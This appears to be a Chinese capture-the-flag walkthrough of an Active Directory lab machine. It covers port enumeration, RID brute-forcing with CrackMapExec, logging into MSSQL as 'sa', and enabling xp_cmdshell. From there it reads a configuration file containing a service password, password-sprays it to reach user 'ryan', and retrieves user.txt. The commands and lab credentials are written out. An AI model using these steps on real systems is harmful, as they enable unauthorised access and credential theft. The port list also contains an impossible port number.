User
端口探测,大概能判别出是一台域控服务器。
53/tcp 和 53/udp - domain:⽤于域名系统(DNS),⽤于将域名转换为对应的IP地址和反向操作
88/tcp 和 88/udp - kerberos-sec:⽤于Kerberos认证协议,⽤于⽹络身份验证。
135/tcp - msrpc:⽤于Microsoft远程过程调⽤(MSRPC),主要⽤于在⽹络上执⾏远程操作。
139/tcp - netbios-ssn:⽤于NetBIOS会话服务,⽤于在⽹络上共享⽂件和打印机等资源。
389/tcp 和 389/udp - ldap:⽤于轻型⽬录访问协议(LDAP),⽤于在⽹络上访问和维护⽬录信息。
445/tcp - microsoft-ds:⽤于Microsoft的共享⽂件和打印机服务,也称为Server Message Block (SMB)。
464/tcp - kpasswd5:⽤于Kerberos密码修改协议,⽤于在⽹络上修改Kerberos认证的密码。
593/tcp - http-rpc-epmap:⽤于Microsoft远程过程调⽤(RPC)端⼝映射,⽤于远程通信。
636/tcp - ldapssl:⽤于加密的轻型⽬录访问协议(LDAP),安全的LDAP通信。
3268/tcp 和 3269/tcp - globalcatLDAP 和 globalcatLDAPssl:⽤于全局⽬录服务的LDAP通信,⽤ 于在多个域之间搜索和查找⽤户信息。
5985/tcp - wsman:⽤于Web Services Management(WS-Management),⽤于远程管理和监视 Windows系统。
9389/tcp - adws:⽤于Active Directory Web Services(ADWS),⽤于在⽹络上管理Active Directory域。
470001/tcp - winrm Windows远程管理服务,⽤于Windows系统的远程管理和配置
49664,49665,49666,49667,49685,49686,49689,49702,49723,49744,49808这些为动态随机端口
使用rid枚举来获取账户名
python cme smb 10.10.11.51 -u "rose" -p "KxEPkKe6R8su" --rid-brute
筛选出SidTypeUser
查看SMB共享文件
使用资源管理器访问//10.10.11.51
从 accounts.xlsx 中获得mssql账户
使用impacket中mssqlclient工具链接
.\mssqlclient.exe sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
使用xp_cmdshell执行命令
当前用户为sql_svc,在users目录中发现ryan用户
在C:下发现SQL2019,cd进去发现ExpressAdv_ENU在该目录下发现sql-Configuration.INI
EXEC xp_cmdshell 'powershell -Command "type C:\\SQL2019\ExpressAdv_ENU\sql-Configuration.INI"'
发现sql_svc账户密码WqSZAF6CysDQbGb3
使用密码喷洒,发现该密码同样为ryan用户密码。
使用ryan用户登录smb,即访问//10.10.11.51,查看文件\10.10.11.51\Users\ryan\Desktop\user.txt